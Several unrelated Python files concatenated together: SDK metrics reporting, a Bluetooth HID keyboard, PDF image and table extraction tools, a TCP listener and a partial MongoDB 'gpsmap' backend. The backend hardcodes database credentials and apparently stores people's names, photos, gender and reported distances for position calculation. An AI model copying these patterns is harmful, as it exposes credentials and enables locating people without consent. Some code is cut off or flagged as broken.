# pylint: disable=broad-except, httplib2 raises all sort of exceptions
# from different modules. We never want a failure to report metrics to
# surface in the terminal so catch everything and log it.
except Exception as e:
log.file_only_logger.exception('Failed to send event: %s, %s',
str(event), e)
finally:
queue.task_done()
def __GetProjectIDHash(self):
"""Gets the hash of the current project id.
Returns:
str, The hex digest of the current project id or None if the
project is not set.
"""
project_id = properties.VALUES.core.project.Get()
if not project_id:
return None
hashed_id = self.__project_ids.get(project_id)
if not hashed_id:
checksum = hashlib.sha1()
checksum.update(project_id)
hashed_id = checksum.hexdigest()
self.__project_ids[project_id] = hashed_id
return hashed_id
def __SendEvent(self, headers, base_params, event):
"""Sends the given event to analytics.
Args:
headers: {name, value}, The HTTP headers to use for this request.
base_params: [(name, value)], The analytics parameters to use for this
event.
event: Event, The event to send
"""
h = httplib2.Http()
params = [
('ec', event.category),
('ea', event.action),
('el', event.label),
('ev', event.value),
]
project_id_hash = self.__GetProjectIDHash()
if project_id_hash:
params.append(('cd11', project_id_hash))
params.extend(base_params)
body = urllib.urlencode(params)
h.request(_ENDPOINT, method='POST', body=body, headers=headers)
def ProcessEvent(self, event):
"""Adds the given event to the processing queue.
Args:
event: _Event, The event to send.
"""
self.__queue.put(event)
def Shutdown(self):
"""Shutdown the metrics thread."""
self.__queue.put(_MetricsWorker.DONE)
# An arbitrarily short time to wait. Hopefully this will be enough to allow
# the thread to get some execution time and finish. If not, it is a daemon
# thread so it will just be killed when we exit, and maybe the metrics
# will not be sent.
self.__thread.join(.5)
_metrics_worker = None
_mutex_lock = mutex.mutex()
_metrics_worker_started = False
@atexit.register
def Shutdown():
"""Shuts down the reporting thread.
The thread will be restarted if you record new events.
"""
def _Shutdown(unused_none):
global _metrics_worker, _metrics_worker_started
if _metrics_worker:
log.debug('Shutting down metrics...')
_metrics_worker.Shutdown()
_metrics_worker = None
_metrics_worker_started = False
_mutex_lock.lock(function=_Shutdown, argument=None)
_mutex_lock.unlock()
def _ProcessEvent(category, action, label, value=0):
"""Common code for processing a metrics event."""
def _CreateWorker(unused_none):
global _metrics_worker, _metrics_worker_started
if not _metrics_worker_started:
_metrics_worker = _MetricsWorker.StartMetrics()
_metrics_worker_started = True
# Don't do metrics for completions.
if '_ARGCOMPLETE' in os.environ:
return
_mutex_lock.lock(function=_CreateWorker, argument=None)
_mutex_lock.unlock()
if _metrics_worker:
_metrics_worker.ProcessEvent(
_Event(category=category, action=action, label=label, value=value))
def Installs(component_id, version_string):
"""Logs that an SDK component was installed.
Args:
component_id: str, The component id that was installed.
version_string: str, The version of the component.
"""
_ProcessEvent('Installs', component_id, version_string)
def Commands(command_path, version_string):
"""Logs that an SDK command was run.
Args:
command_path: str, The '.' separated name of the calliope command.
version_string: str, The version of the command.
"""
if not version_string:
version_string = 'unknown'
_ProcessEvent('Commands', command_path, version_string)
def Executions(command_name, version_string):
"""Logs that a top level SDK script was run.
Args:
command_name: str, The script name.
version_string: str, The version of the command.
"""
if not version_string:
version_string = 'unknown'
_ProcessEvent('Executions', command_name, version_string)
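# --- Illustrative usage sketch (not part of the original module) -------------
# Each helper above queues a single Google Analytics "event" hit on the
# background worker thread; the atexit-registered Shutdown() gives that thread
# up to 0.5s to drain its queue on exit. A caller inside the SDK would use it
# roughly like this (import path and names are assumptions for illustration):
#
#   from googlecloudsdk.core import metrics
#
#   metrics.Installs('example-component', '1.2.3')       # category 'Installs'
#   metrics.Commands('example.group.command', '1.2.3')   # category 'Commands'
#   metrics.Executions('example-script', '1.2.3')        # category 'Executions'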
|
hogKeyboard.py
|
####################################################################################################################
#
# *****smartRemotes created by HeadHodge*****
#
# HeadHodge/smartRemotes is licensed under the MIT License
#
# A short and simple permissive license with conditions only requiring preservation of copyright and license notices.
# Licensed works, modifications, and larger works may be distributed under different terms and without source code.
#
####################################################################################################################
###########################################
# HOG KEYBOARD
###########################################
print("Load hogKeyboard")
from gi.repository import GLib
from dbus.mainloop.glib import DBusGMainLoop
import os, sys, time, traceback, json, threading
import dbus, gattBridge
_mainloop = None
_keyboard = None
#name="Human Interface Device" sourceId="org.bluetooth.service.human_interface_device" type="primary" uuid="1812"
class HIDService(gattBridge.Service):
SERVICE_UUID = '1812'
def __init__(self, bus, index):
gattBridge.Service.__init__(self, bus, index, self.SERVICE_UUID, True)
self.report = ReportCharacteristic(bus, 0, self)
self.reportMap = ReportMapCharacteristic(bus, 1, self)
self.hidInfo = HIDInfoCharacteristic(bus, 2, self)
self.protocolMode = ProtocolModeCharacteristic(bus, 3, self)
self.controlPoint = ControlPointCharacteristic(bus, 4, self)
#self.report1 = Report1Characteristic(bus, 5, self)
self.add_characteristic(self.report)
self.add_characteristic(self.reportMap)
self.add_characteristic(self.hidInfo)
self.add_characteristic(self.protocolMode)
self.add_characteristic(self.controlPoint)
#self.add_characteristic(self.report1)
#id="report" name="Report" sourceId="org.bluetooth.characteristic.report" uuid="2A4D"
class ReportCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4D'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read', 'notify'],
service)
'''
<Field name="Report Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Repeated>true</Repeated>
</Field>
Use standard key codes: https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf
'''
self.add_descriptor(ReportReferenceDescriptor(bus, 1, self))
self.isConnected = False
self.value = [dbus.Byte(0x00),dbus.Byte(0x00)]
#print(f'***Report value***: {self.value}')
def sendKey(self, keyBytes, keyHold):
#send keyCode
print(f' \n***Send report keyCode: {[hex(x) for x in keyBytes]}, keyHold: {keyHold}***');
#if(self.isConnected == False): print('Abort Report2: Not connected to client'); return
self.PropertiesChanged(gattBridge.GATT_CHRC_IFACE, { 'Value': [dbus.Byte(keyBytes[0]),dbus.Byte(keyBytes[1])] }, []) # gattApplication is never imported in this module; gattBridge is assumed to expose GATT_CHRC_IFACE
GLib.timeout_add(keyHold, self.sendNull)
def sendNull(self):
self.PropertiesChanged(gattBridge.GATT_CHRC_IFACE, { 'Value': [dbus.Byte(0x00),dbus.Byte(0x00)] }, [])
return False
def ReadValue(self, options):
print(f'Read Report: {self.value}')
return self.value
def StartNotify(self):
print(f' \n***CONNECTED: Report Data to Client')
self.isConnected = True
#GLib.timeout_add(15000, self.send)
def StopNotify(self):
print(f' \n***DISCONNECTED: Report Client')
self.isConnected = False
#type="org.bluetooth.descriptor.report_reference" uuid="2908"
class ReportReferenceDescriptor(gattBridge.Descriptor):
DESCRIPTOR_UUID = '2908'
def __init__(self, bus, index, characteristic):
gattBridge.Descriptor.__init__(
self, bus, index,
self.DESCRIPTOR_UUID,
['read'],
characteristic)
'''
<Field name="Report ID">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Minimum>0</Minimum>
<Maximum>255</Maximum>
</Field>
<Field name="Report Type">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Minimum>1</Minimum>
<Maximum>3</Maximum>
<Enumerations>
<Enumeration value="Input Report" key="1"/>
<Enumeration value="Output report" key="2"/>
<Enumeration value="Feature Report" key="3"/>
<ReservedForFutureUse start="4" end="255"/>
<ReservedForFutureUse1 start1="0" end1="0"/>
</Enumerations>
</Field>
'''
# This report uses ReportId 2 as defined in the ReportMap characteristic
self.value = dbus.Array(bytearray.fromhex('0201'), signature=dbus.Signature('y'))
#print(f'***ReportReference***: {self.value}')
def ReadValue(self, options):
print(f'Read ReportReference: {self.value}')
return self.value
#sourceId="org.bluetooth.characteristic.report_map" uuid="2A4B"
class ReportMapCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4B'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read'],
service)
'''
<Field name="Report Map Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Repeated>true</Repeated>
</Field>
HID Report Descriptors https://www.usb.org/sites/default/files/documents/hid1_11.pdf
HID Report Parser https://eleccelerator.com/usbdescreqparser/
'''
##############################################################################################
# This Report Descriptor defines 2 Input Reports
# ReportMap designed by HeadHodge
#
# <Report Layouts>
# <Report>
# <ReportId>1</ReportId>
# <Description>HID Keyboard Input</Description>
# <Example>KeyCode capital 'M' = [dbus.Byte(0x02), dbus.Byte(0x10)]</Example>
# <Field>
# <Name>Keyboard Modifier</Name>
# <Size>uint8</Size>
# <Format>
# <Bit0>Left CTRL Key Pressed</Bit0>
# <Bit1>Left SHIFT Key Pressed</Bit1>
# <Bit2>Left ALT Key Pressed</Bit2>
# <Bit3>Left CMD(Window) Key Pressed</Bit3>
# <Bit4>Right CTRL Key Pressed</Bit4>
# <Bit5>Right SHIFT Key Pressed</Bit5>
# <Bit6>Right ALT Key Pressed</Bit6>
# <Bit7>Right CMD(Window) Key Pressed</Bit7>
# </Format>
# </Field>
# <Field>
# <Name>Keyboard Input KeyCode</Name>
# <Size>uint8</Size>
# </Field>
# </Report>
# <Report>
# <ReportId>2</ReportId>
# <Description>HID Consumer Input</Description>
# <Example>KeyCode 'VolumeUp' = [dbus.Byte(0xe9), dbus.Byte(0x00)]</Example>
# <Field>
# <Name>Consumer Input KeyCode</Name>
# <Size>uint16</Size>
# </Field>
# </Report>
# </Report Layouts>
##############################################################################################
#USB HID Report Descriptor
self.value = dbus.Array(bytearray.fromhex('05010906a1018501050719e029e71500250175019508810295017508150025650507190029658100c0050C0901A101850275109501150126ff0719012Aff078100C0'))
self.isMapLoaded = False
#print(f'***ReportMap value***: {self.value}')
def ReadValue(self, options):
print(f'Read ReportMap: {self.value}')
self.isMapLoaded = True
return self.value
#id="hid_information" name="HID Information" sourceId="org.bluetooth.characteristic.hid_information" uuid="2A4A"
class HIDInfoCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4A'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
['read'],
service)
'''
<Field name="bcdHID">
<InformativeText>16-bit unsigned integer representing version number of base USB HID Specification implemented by HID Device</InformativeText>
<Requirement>Mandatory</Requirement>
<Format>uint16</Format>
</Field>
<Field name="bCountryCode">
<InformativeText>Identifies which country the hardware is localized for. Most hardware is not localized and thus this value would be zero (0).</InformativeText>
<Requirement>Mandatory</Requirement>
<Format>8bit</Format>
</Field>
<Field name="Flags">
<Requirement>Mandatory</Requirement>
<Format>8bit</Format>
<BitField>
<Bit index="0" size="1" name="RemoteWake">
<Enumerations>
<Enumeration key="0" value="The device is not designed to be capable of providing wake-up signal to a HID host"/>
<Enumeration key="1" value="The device is designed to be capable of providing wake-up signal to a HID host"/>
</Enumerations>
</Bit>
<Bit index="1" size="1" name="NormallyConnectable">
<Enumerations>
<Enumeration key="0" value="The device is not normally connectable"/>
<Enumeration key="1" value="The device is normally connectable"/>
</Enumerations>
</Bit>
<ReservedForFutureUse index="2" size="6"/>
</BitField>
</Field>
'''
self.value = dbus.Array(bytearray.fromhex('01110003'), signature=dbus.Signature('y'))
#print(f'***HIDInformation value***: {self.value}')
def ReadValue(self, options):
print(f'Read HIDInformation: {self.value}')
return self.value
#name="Protocol Mode" sourceId="org.bluetooth.characteristic.protocol_mode" uuid="2A4E"
class ProtocolModeCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4E'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
["read", "write-without-response"],
service)
'''
<Field name="Protocol Mode Value">
<Requirement>Mandatory</Requirement>
<Format>uint8</Format>
<Enumerations>
<Enumeration key="0" value="Boot Protocol Mode"/>
<Enumeration key="1" value="Report Protocol Mode"/>
<ReservedForFutureUse start="2" end="255"/>
</Enumerations>
'''
#self.value = dbus.Array([1], signature=dbus.Signature('y'))
self.parent = service
self.value = dbus.Array(bytearray.fromhex('01'), signature=dbus.Signature('y'))
#print(f'***ProtocolMode value***: {self.value}')
def ReadValue(self, options):
print(f'Read ProtocolMode: {self.value}')
return self.value
def WriteValue(self, value, options):
print(f'Write ProtocolMode {value}')
self.value = value
#sourceId="org.bluetooth.characteristic.hid_control_point" uuid="2A4C"
class ControlPointCharacteristic(gattBridge.Characteristic):
CHARACTERISTIC_UUID = '2A4C'
def __init__(self, bus, index, service):
gattBridge.Characteristic.__init__(
self, bus, index,
self.CHARACTERISTIC_UUID,
["write-without-response"],
service)
self.value = dbus.Array(bytearray.fromhex('00'), signature=dbus.Signature('y'))
#print(f'***ControlPoint value***: {self.value}')
def WriteValue(self, value, options):
print(f'Write ControlPoint {value}')
self.value = value
#############################################
def onConnectSignal(interface, changed, data=[]):
#############################################
if(changed.get("Connected", None) == None): return
print(f'****CONNECTION ALERT****, interface: {interface}, connected: {changed.get("Connected", 1)}')
#start advertising if not connected to host device
isConnected = btDevice.isConnected()
print(f'Host Device, isConnected: {isConnected}')
if(changed["Connected"] == True): return
return
####################################
async def receivedCommand(controlCommand):
####################################
try:
hidReport = controlCommand.get('hidReport', 1)
hidCode = controlCommand.get('hidCode', 0)
hidMod = controlCommand.get('hidMod', 0)
hidWait = controlCommand.get('hidWait', 0) * 1000
hidRepeat = controlCommand.get('hidRepeat', 0)
if(hidReport == 1):
#Transfer Keyboard Input
keyBytes = [hidMod, hidCode]
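# NOTE: Report1Characteristic is commented out in HIDService above, so this
# keyboard-report path would raise AttributeError until it is re-enabled.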
_keyboard.hidService.report1.sendKey(keyBytes, hidWait)
return
elif(hidReport == 2):
#Transfer Consumer Input
keyBytes = hidCode.to_bytes(2, byteorder='little')
_keyboard.services[0].report.sendKey(keyBytes, hidWait)
return
else:
print(f'Abort transfer, Invalid hidReport: {hidReport}')
except:
print('Abort transfer: ', sys.exc_info()[0])
traceback.print_exc()
####################################
def start(options={}):
####################################
try:
print("Start hidKeyboard")
global _mainloop, _keyboard
_keyboard = gattBridge.Application([HIDService])
#start advertising
#print(' \n***ADVERTISE: Host device not connected');
#os.system("hcitool -i hci0 cmd 0x08 0x0006 50 00 50 00 00 00 00 00 00 00 00 00 00 07 00")
#os.system("hcitool -i hci0 cmd 0x08 0x000a 01")
# Enable ConnectSignal
#threading.Thread(target=btDevice.enableConnectSignal, args=(onConnectSignal,)).start()
#btleDevice.enableConnectSignal(onConnectSignal)
#print(f'Connected: {btleDevice.isConnected()}')
#onConnectSignal('org.bluez.Device1', {'Connected': btDevice.isConnected()})
# Start btOutput event loop
#print('start hogKeyboard mainLoop')
_mainloop = GLib.MainLoop()
_mainloop.run()
except:
print('Abort hogKeyboard: ', sys.exc_info()[0])
traceback.print_exc()
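# --- Illustrative sketch (not part of the original module) -------------------
# The ReportMap comment block above defines two input reports: ReportId 1 sends
# [modifier, keycode] (e.g. capital 'M' = [0x02, 0x10]) and ReportId 2 sends a
# little-endian uint16 consumer usage (e.g. 'VolumeUp' = 0x00E9 -> [0xe9, 0x00]).
# The helper below only sketches the controlCommand dict that receivedCommand()
# expects; the field names are taken from that function, the values are made up.
def _example_volume_up_command():
    return {
        'hidReport': 2,       # consumer input report (ReportId 2)
        'hidCode': 0x00E9,    # Volume Up usage id
        'hidMod': 0,          # no modifier for consumer keys
        'hidWait': 0.1,       # seconds before the null (key-release) report
        'hidRepeat': 0,
    }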
##########################
# MAIN
##########################
if __name__ == '__main__':
start()
|
pdf.py
|
import threading
from functools import partial
from logging import getLogger
from os import makedirs
from pathlib import Path
import re
from subprocess import Popen, run, getstatusoutput, check_output
from sys import platform as _platform
from kivymd.toast import toast
from kivymd.uix.button import MDFlatButton
from kivymd.uix.dialog import MDDialog
from kivymd.uix.list import MDList, OneLineListItem, OneLineAvatarListItem
from kivymd.uix.textfield import MDTextField
from kivymd.uix.boxlayout import MDBoxLayout
from tesseractXplore.widgets import MyToggleButton
from tesseractXplore.app import alert, get_app
from tesseractXplore.constants import PDF_DIR
from tesseractXplore.widgets.lists import SwitchListItem
from kivymd.uix.progressbar import MDProgressBar
logger = getLogger().getChild(__name__)
def pdf_dialog(pdfpath,cmds):
# Called by image_glob.py
def close_dialog(instance, *args):
instance.parent.parent.parent.parent.dismiss()
layout = MDList()
pdfinfos = check_output([cmds["pdfimages"], "-list", pdfpath]).decode('utf-8')
pdfinfos = re.sub(r' +', ' ', pdfinfos)
pdfinfos = pdfinfos.split("\n")[2:-1]
pages = str(len(pdfinfos))
if pages != "0":
dpis = [pdfinfo.split(" ")[-3] for pdfinfo in pdfinfos]
from collections import Counter
dpi = Counter(dpis).most_common(1)[0][0]
else:
pdfinfos = check_output([cmds["pdfinfo"], pdfpath]).decode('utf-8')
pages = pdfinfos.split("\n")[9].split(": ")[-1].strip()
dpi = 300
layout.add_widget(OneLineListItem(text=f'The detected resolution is: {dpi}'))
layout.add_widget(OneLineListItem(text='First page'))
# id first
layout.add_widget(MDTextField(text="0", hint_text="First page", height=400))
layout.add_widget(OneLineListItem(text='Last page'))
# id last
layout.add_widget(MDTextField(text=pages, hint_text="Last page", height=400))
layout.add_widget(OneLineListItem(text='Imageformat (jpeg, jp2, png, ppm (default), tiff)'))
# id = "fileformat"
boxlayout = MDBoxLayout(orientation="horizontal", adaptive_height=True)
boxlayout.add_widget(MyToggleButton(text="jpeg", group="imageformat"))
boxlayout.add_widget(MyToggleButton(text="jp2", group="imageformat"))
defaulttoggle = MyToggleButton(text="ppm", group="imageformat")
boxlayout.add_widget(defaulttoggle)
boxlayout.add_widget(MyToggleButton(text="png", group="imageformat"))
boxlayout.add_widget(MyToggleButton(text="tiff", group="imageformat"))
layout.add_widget(boxlayout)
layout.add_widget(OneLineListItem(text='Process to convert PDF to images'))
# id="converting",
boxlayout = MDBoxLayout(orientation="horizontal", adaptive_height=True)
boxlayout.add_widget(MyToggleButton(text="rendering", group="converting"))
defaulttoggle = MyToggleButton(text="extraction", group="converting")
boxlayout.add_widget(defaulttoggle)
layout.add_widget(boxlayout)
# id='include_pagenumber',
pagenumbers = OneLineAvatarListItem(text='Include page numbers in output file names')
# id = 'include_pagenumber_chk'
pagenumbers.add_widget(SwitchListItem())
layout.add_widget(pagenumbers)
dialog = MDDialog(title="Extract images from PDF",
type='custom',
auto_dismiss=False,
text=pdfpath,
content_cls=layout,
buttons=[
MDFlatButton(
text="CREATE IMAGES", on_release=partial(pdfimages_threading, pdfpath, cmds)
),
MDFlatButton(
text="VIEW PDF", on_release=partial(open_pdf, pdfpath)
),
MDFlatButton(
text="DISCARD", on_release=close_dialog
),
],
)
defaulttoggle.state = 'down'
dialog.content_cls.focused = True
dialog.open()
def pdfimages_threading(pdfpath, cmds, instance, *args):
instance.parent.parent.parent.parent.dismiss()
pdfimages_thread = threading.Thread(target=pdfimages, args=(pdfpath, cmds, instance, args))
pdfimages_thread.daemon = True
pdfimages_thread.start()
def open_pdf(fname, *args):
""" Open a pdf via webbrowser or another external software """
pdfviewer = get_app().settings_controller.pdfviewer
if pdfviewer == 'webbrowser':
import webbrowser
webbrowser.open(str(Path(fname).absolute()))
else:
try:
run([pdfviewer, str(Path(fname).absolute())])
except:
alert(f"Couldn't find: {pdfviewer}")
pass
def pdfimages(pdfpath, cmds, instance, *args):
pb = MDProgressBar(color=get_app().theme_cls.primary_color, type="indeterminate")
status_bar = get_app().image_selection_controller.status_bar
status_bar.clear_widgets()
status_bar.add_widget(pb)
pb.start()
pdfdir = Path(pdfpath.split('.')[0])
makedirs(pdfdir, exist_ok=True)
params = []
children = instance.parent.parent.parent.parent.content_cls.children
process = cmds["pdfimages"]
for idx, child in enumerate(reversed(children)):
if idx == 6:
for fileformat in child.children:
if fileformat.state == 'down':
params.extend([f"-{fileformat.text}"])
if idx == 2 and child.text != "":
params.extend(["-f", child.text])
if idx == 4 and child.text != "":
params.extend(["-l", child.text])
if idx == 9 and child.ids['_left_container'].children[0].active:
params.extend(["-p"])
if idx == 8:
for convprocess in child.children:
if convprocess.state == 'down':
if convprocess.text == "rendering":
process = cmds["pdftoppm"]
else:
process = cmds["pdfimages"]
fileformat.text = "j" if fileformat.text == "jpeg" else fileformat.text
fileformat.text = "jpeg" if fileformat.text == "jp2" else fileformat.text
p1 = Popen([process, *params, pdfpath, pdfdir.joinpath(pdfdir.name)])
p1.communicate()
get_app().image_selection_controller.file_chooser._update_files()
get_app().image_selection_controller.add_images([pdfdir])
pb.stop()
def extract_pdf(pdfpath):
if _platform not in ["win32", "win64"]:
if getstatusoutput("pdfimages")[0] not in [1, 127]:
cmds ={"pdfimages":"pdfimages",
"pdfinfo":"pdfinfo",
"pdftoppm":"pdftoppm"}
pdf_dialog(pdfpath, cmds)
return pdfpath.split(".")[0]
else:
toast("Please install Poppler-utils to work convert PDFs to images with:")
toast("sudo apt-get install poppler-utils")
else:
pdftoolpath = Path(PDF_DIR)
if not pdftoolpath.exists():
# TODO: Doesn't work properly at the moment; should use the official download site
try:
install_win(pdftoolpath)
except:
logger.info(f'Download: Error while downloading')
return
binpath = list(pdftoolpath.glob("./**/**/bin"))[0]
cmds = {"pdfimages": str(binpath.joinpath("pdfimages.exe").absolute()),
"pdfinfo": str(binpath.joinpath("pdfinfo.exe").absolute()),
"pdftoppm": str(binpath.joinpath("pdftoppm.exe").absolute())}
pdf_dialog(pdfpath,cmds)
return pdfpath
def install_win(pdftoolpath):
import requests, zipfile, io
url = 'https://digi.bib.uni-mannheim.de/~jkamlah/poppler-0.68.0_x86.zip'
#url = 'http://blog.alivate.com.au/wp-content/uploads/2018/10/poppler-0.68.0_x86.7z'
r = requests.get(url, stream=True)
pdftoolpath.mkdir(parents=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall(str(pdftoolpath.absolute()))
toast('Download: Poppler successful')
logger.info('Download: Successful')
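# --- Illustrative sketch (not part of the original module) -------------------
# pdfimages() above assembles a Poppler command line from the dialog widgets.
# The equivalent manual invocations look roughly like this (paths made up):
#
#   pdfimages -png -f 0 -l 10 -p scan.pdf scan/scan   # extract embedded images
#   pdftoppm  -png -f 0 -l 10    scan.pdf scan/scan   # render pages instead
#
# -f/-l bound the page range, the format flag picks the output image type, and
# the last two arguments are the input PDF and the output filename prefix.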
|
pdf_reader.py
|
from multiprocessing import JoinableQueue, Process, Queue, Value
import camelot
import fitz
import pandas as pd
from PIL import Image, ImageDraw
from .bar_utils import ProcessBar
from .database import Job, db
from .utils import simple_job
ZOOM_FACTOR = 4.166106501051772
def blocks_without_table(blocks, table_bbox):
blocks = [
(
block[0] * ZOOM_FACTOR,
block[1] * ZOOM_FACTOR,
block[2] * ZOOM_FACTOR,
block[3] * ZOOM_FACTOR,
block[4],
block[5],
block[6],
)
for block in blocks
]
rects = [
fitz.Rect(table_pos[0], table_pos[1], table_pos[2], table_pos[3])
for table_pos in table_bbox.keys()
]
blocks = [
block
for block in blocks
if all(map(lambda rect: fitz.Rect(block[:4]) not in rect, rects))
]
return blocks
def extract_pdf(job, debug):
if debug:
print(job.id, "start")
tables = camelot.read_pdf(
job.path,
pages="all",
split_text=True,
)
# https://stackoverflow.com/questions/58837504/camelot-pdf-extraction-fail-parsing
# print(pd.concat([table.df for table in tables]).to_string())
img_array, table_bbox = tables[0]._image
doc = fitz.open(job.path)
page = doc[0]
blocks = blocks_without_table(
page.getTextPage().extractBLOCKS(), table_bbox
) # faster than page.getText("blocks")
# for block in blocks:
# print(block[4])
img = Image.fromarray(img_array, "RGB")
draw = ImageDraw.Draw(img)
for block in blocks + list(table_bbox):
draw.rectangle(
(block[0], block[1], block[2], block[3]),
outline=(255, 0, 0),
width=3,
)
if debug:
print(job.id, "end")
def process_job(workers, queue, db_queue, debug):
while True:
job = queue.get()
workers.do()
extract_pdf(job, debug)
workers.end()
job.status = 2
db_queue.put(job)
queue.task_done()
class Workers:
def __init__(self, workers_cnt, queue, db_queue, debug):
self.workers = []
self.pending = Value("i", 0)
self.cnt = Value("i", 0)
for _ in range(workers_cnt):
worker = Process(
target=process_job, args=(self, queue, db_queue, debug)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
def do(self):
self.pending.value += 1
def end(self):
self.cnt.value += 1
self.pending.value -= 1
def __len__(self):
return len(self.workers)
def pdf_workers(workers_count=2, debug=True, files=0):
if db.is_closed():
db.connect()
additional = Job.select().where(Job.status == 1).count()
Job.update(status=0).where(Job.status == 1).execute()
progress_bar = ProcessBar(additional + files, debug=files != 0)
queue = JoinableQueue()
db_queue = Queue()
workers = Workers(workers_count, queue, db_queue, files == 0)
while True:
if files != 0 and Job.select().where(Job.status != 2).count() == 0:
break
progress_bar.update((workers.cnt.value - progress_bar.value))
if not db_queue.empty():
jobs = []
while not db_queue.empty():
jobs.append(db_queue.get())
with db.atomic():
Job.bulk_update(jobs, fields=["status"], batch_size=100)
elif workers_count - queue.qsize() > 0:
additional_jobs = min(
Job.select().where(Job.status == 0).count(),
len(workers) - workers.pending.value,
)
if additional_jobs == 0:
continue
jobs = []
for job in (
Job.select()
.where(Job.status == 0)
.paginate(1, additional_jobs)
):
job.status = 1
jobs.append(job)
with db.atomic():
Job.bulk_update(jobs, fields=["status"], batch_size=100)
for job in jobs:
queue.put(job)
queue.join()
db.close()
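# --- Illustrative usage sketch (not part of the original module) -------------
# The flow above is: Job rows with status == 0 are claimed in batches, pushed
# onto the JoinableQueue, processed by the worker processes (extract_pdf), and
# written back through db_queue with status == 2. A caller would roughly do
# the following (Job fields other than `path` and `status` are assumptions):
#
#   from .database import Job, db
#
#   with db.atomic():
#       Job.create(path='/tmp/example.pdf', status=0)    # hypothetical row
#   pdf_workers(workers_count=2, debug=True, files=1)    # blocks until done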
|
__main__.py
|
import socket
import argparse
import time
from threading import Thread
from acceptor import listenForClients
# Do argument work
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--port", default=6060)
args = ap.parse_args()
# Deal with type conversions
args.port = int(args.port)
# Start up master socket
sessions = []
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("0.0.0.0", args.port))
sock.listen(1)
# Listen for clients in a thread
print("Started listener")
client_listener = Thread(target=listenForClients, args=[sock])
client_listener.start()
while True:
time.sleep(1)
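# --- Illustrative client sketch (not part of the original module) ------------
# The loop above only keeps the process alive; accepted clients are handled by
# acceptor.listenForClients. A minimal client for manual testing could be:
#
#   import socket
#   s = socket.create_connection(("127.0.0.1", 6060))   # default --port
#   s.sendall(b"hello\n")
#   s.close()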
|
backend.py
|
import pymongo
import datetime
import json
import Queue
import threading
import time
import calc_postion
from pprint import pprint
import md5
from baselib import error_print
global_db_name = "gpsmap"
global_db_url = "mongodb://gpsmap:gpsmap@127.0.0.1:27017/"+global_db_name
global_db_origin_collection = "origin"
global_db_calc_collection = "calc"
global_db_user_collection = "userextern"
global_db_device_collection = "device"
global_key_la = "latitude"
global_key_lo = "longitude"
global_key_list = "items"
global_key_sendtime = "sendtime"
global_key_uid = "id"
global_key_dis = "distance"
global_key_name = "name"
global_key_img = "img"
global_key_gender = "gender"
global_key_device = "device"
global_default_base_time = datetime.datetime(1970,1,1,0,0,0,0)
global_default_uint_time = 60 * 10
global_care_keys = [global_key_la, global_key_lo, global_key_list, global_key_sendtime]
global_origin_keys = [global_key_uid, global_key_la, global_key_lo, global_key_sendtime, global_key_dis]
'''
origin:
_id: obj()
loc:
type: "Point"
coordinates: []
distance: "300"
sendtime: "2016-01-01 01:01:01"
time: "2016-01-01 01:01:01"
id : "string"
calc:
_id: obj()
id: "string"
time: "2016-01-01 01:01:01"
loc:
type: "Point"
coordinates: []
distance: "300"
level: 0 unused
1 High
...
5 Low
'''
def md5String(s):
try:
s = s.encode(encoding="utf-8")
return md5.new(s).hexdigest()
except Exception as e:
error_print(e)
return None
def CreateUID(obj):
'''
Create the unique id from the MD5 of the user's name; fall back to the raw id when no name is present.
'''
## global_key_uid
## global_key_img
md5key_list = [global_key_name]
try:
m = md5.new()
ret = ""
for key in md5key_list:
if key not in obj:
return obj[global_key_uid]
value = obj[key].encode(encoding="utf-8")
m.update(value)
ret += "{0:04d}".format(len(value))
ret_m = m.hexdigest()
if not ret_m:
return obj[global_key_uid]
return ret + ret_m
except Exception as e:
error_print(e)
return None
"""
origin :
{
"id", "time", "sendtime", "distance",
"loc": { type: "Point", coordinates: [ 40, 5 ] }
}
{
"id" : 1
"time" : -1
"loc" : "2dsphere"
}
userextern
{
"id": 1
"time": -1
}
calc
{
"id": 1
"loc": "2dsphere"
"distance":
"time": -1
}
device
{
"device": 1
"loc" : "2dsphere"
"time": -1
}
"""
global_timedelta = datetime.timedelta(minutes=5)
global_calc_timedelta = datetime.timedelta(minutes=1)
global_EP = 50
global_timeformat_string = "%Y-%m-%d %H:%M:%S"
global_timeformat_string_minutes = "%Y-%m-%d %H:%M"
def time_format(date):
return date.strftime(global_timeformat_string)
def string_to_time(s):
try:
return datetime.datetime.strptime(s, global_timeformat_string)
except Exception as e:
return None
def string_standard(s):
try:
return time_format(string_to_time(s))
except Exception as e:
return None
def time_now():
return time_format( datetime.datetime.now() )
def string_time_to_unit(start, check, tunit):
try:
c = string_to_time(check)
d = c - start
ret = d.total_seconds() / tunit
return int(ret)
except Exception as e:
return None
def string_min_whole(s, start, tunit):
de = datetime.timedelta(seconds = s * tunit)
return time_format(start + de)
def fretch_gps_from_data(data):
try:
return data["loc"]["coordinates"][1], data["loc"]["coordinates"][0], int(data["distance"])
except Exception as e:
return None, None, None
class opt():
def __init__(self):
self.connect = pymongo.MongoClient(global_db_url)
self.queue = Queue.Queue()
self.mutex = threading.Lock()
self.thread = None
def Start_Calc_Thread(self):
if self.mutex.acquire():
if not self.thread or not self.thread.is_alive():
self.thread = None
self.thread = threading.Thread(target=self.ThreadCore)
self.thread.start()
self.mutex.release()
def ThreadCore(self):
print("In Core.")
while not self.queue.empty():
try:
ids = self.queue.get(False)
print("Check ids {0}.".format(len(ids)))
n = self.calc_list_id(ids)
